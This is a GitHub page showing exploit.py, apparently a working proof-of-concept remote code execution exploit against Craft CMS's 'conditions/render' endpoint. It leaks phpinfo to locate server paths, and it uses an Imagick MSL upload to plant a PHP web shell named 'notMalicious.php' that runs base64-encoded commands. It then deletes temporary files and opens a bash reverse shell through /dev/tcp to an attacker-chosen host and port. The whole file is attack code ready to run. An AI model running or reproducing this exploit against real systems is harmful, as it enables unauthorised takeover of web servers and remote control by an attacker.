-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathexploit.py
More file actions
115 lines (86 loc) · 3.83 KB
/
Copy pathexploit.py
File metadata and controls
115 lines (86 loc) · 3.83 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
import requests
import re
import sys
import argparse
import base64
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.88 Safari/537.36"
}
phpFileName="notMalicious.php"
def deployPhpFile(documentRoot, tmpDir):
data = {
"action": "conditions/render",
"configObject[class]": "craft\elements\conditions\ElementCondition",
"config": '{"name":"configObject","as ":{"class":"Imagick", "__construct()":{"files":"vid:msl:' + tmpDir + r'/php*"}}}'
}
files = {
"image1": ("pwn1.msl", """<?xml version="1.0" encoding="UTF-8"?>
<image>
<read filename="caption:<?php @system(@base64_decode(@$_REQUEST['cmd'])); ?>"/>
<write filename="info:PHPFILE">
</image>""".replace("PHPFILE", documentRoot + "/"+ phpFileName), "text/plain")
}
response = requests.post(url, headers=headers, data=data, files=files)
#502 is good
if response.status_code != 502:
response.raise_for_status()
def getTmpUploadDirAndDocumentRoot():
data = {
"action": "conditions/render",
"configObject[class]": "craft\elements\conditions\ElementCondition",
"config": r'{"name":"configObject","as ":{"class":"\\GuzzleHttp\\Psr7\\FnStream", "__construct()":{"methods":{"close":"phpinfo"}}}}'
}
response = requests.post(url, headers=headers, data=data)
response.raise_for_status()
pattern1 = r'<tr><td class="e">upload_tmp_dir<\/td><td class="v">(.*?)<\/td><td class="v">(.*?)<\/td><\/tr>'
pattern2 = r'<tr><td class="e">\$_SERVER\[\'DOCUMENT_ROOT\'\]<\/td><td class="v">([^<]+)<\/td><\/tr>'
match1 = re.search(pattern1, response.text, re.DOTALL)
match2 = re.search(pattern2, response.text, re.DOTALL)
return match1.group(1), match2.group(1)
def shell(cmd):
cmd_bytes = cmd.encode('utf-8')
base64_bytes = base64.b64encode(cmd_bytes)
base64EncodedCmd = base64_bytes.decode('utf-8')
print("[-] Executing cmd [{}] base64 encoded: [{}]".format(cmd, base64EncodedCmd))
response = requests.get(url + "/" + phpFileName, params={"cmd": base64EncodedCmd})
response.raise_for_status()
#print(response.text)
match = re.search(r'caption:(.*?)CAPTION', response.text, re.DOTALL)
if match:
extracted_text = match.group(1).strip()
else:
return None
return extracted_text
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("url")
parser.add_argument("-r","--remote-host", required=True)
parser.add_argument("-p","--port", required=True)
args = parser.parse_args()
url = args.url
port = args.port
host = args.remote_host
try:
print("[-] Get temporary folder and document root ...")
upload_tmp_dir, documentRoot = getTmpUploadDirAndDocumentRoot()
if "no value" in upload_tmp_dir:
upload_tmp_dir = "/tmp"
print("[-] Temporary Folder: [{}] Document Root: [{}]".format(upload_tmp_dir, documentRoot))
print("[-] Deploy PHP file {} ...".format(phpFileName))
deployPhpFile(documentRoot, upload_tmp_dir)
print("[-] Delete /tmp/php*")
shell("rm {}/php*".format(upload_tmp_dir))
print("[-] Spawning reverse shell to {host}:{port}")
shell("bash -c 'bash -i >& /dev/tcp/{}/{} 0>&1'".format(host,port))
print("[-] Done for today")
#while True:
# cmd = input("$ ")
# shell(cmd)
except requests.exceptions.ConnectionError:
print("[X] A connection error occurred. Cannot connect to:", url)
except requests.exceptions.Timeout:
print("[X] The request timed out.")
except requests.exceptions.HTTPError as e:
print("[X] HTTP Error:", e)
except requests.exceptions.RequestException as e:
print("[X] An error occurred:", e)